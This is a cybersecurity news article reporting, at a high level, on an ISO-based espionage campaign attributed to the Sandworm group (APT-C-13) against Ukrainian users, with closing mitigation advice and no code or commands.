A sophisticated state-backed hacking group, notorious for targeting critical sectors, is now focusing on Remote Desktop Protocol (RDP) servers. This group, identified as APT-C-13 and also known by names such as Sandworm and APT44, has been active in cyber espionage operations since 2009. Their latest campaign signifies a strategic move towards long-term infiltration aimed at intelligence gathering.
Change in Strategy: From Destruction to Infiltration
APT-C-13 has shifted its approach from immediate disruption to sustained espionage. This campaign uses a deceptive ISO image named Microsoft.Office.2025×64.v2025.iso, distributed on Telegram and other platforms, primarily targeting users in Ukraine. Upon mounting the image, unsuspecting users trigger hidden executables that begin the infection process.
By exploiting the trust associated with familiar software names, these executables install a loader that profiles the victim’s system, preparing it for further malicious payloads. Weixin’s 360 Threat Intelligence Center has confirmed that APT-C-13 is utilizing a modular framework known as the Tambur/Sumbur/Kalambur series.
Technical Details and Impact
The campaign’s impact is profound, using legitimate Windows tools such as PowerShell and SSH to remain undetected by conventional antivirus software. This strategic patience allows the attackers to extract sensitive information over months. The group achieves persistence through scheduled tasks that mimic legitimate Windows components, maintaining constant access via the RDP service.
Further control is established using the Kalambur and Sumbur modules, which channel command-and-control traffic through the Tor network, concealing the attackers’ locations. SSH reverse tunneling allows remote access to infected systems, while Sumbur integrates seamlessly with Windows processes, further obfuscating its presence.
Recommendations for Mitigation
The DemiMur module exacerbates the threat by injecting a forged root certificate, causing Windows to trust all malicious payloads. This, combined with disabling Microsoft Defender protections, renders the system vulnerable. To counteract this, organizations should block unauthorized ISO images and activation tools, and monitor internal network activities for anomalies.
Ensuring endpoint security is up-to-date and conducting regular scans are crucial steps. Additionally, institutions should enhance auditing practices and establish detection rules for unusual RDP and SSH activity, mitigating the risk of long-term data breaches.
Stay informed about the latest updates by following us on Google News, LinkedIn, and X. Set CSN as your preferred source on Google for timely cybersecurity news.
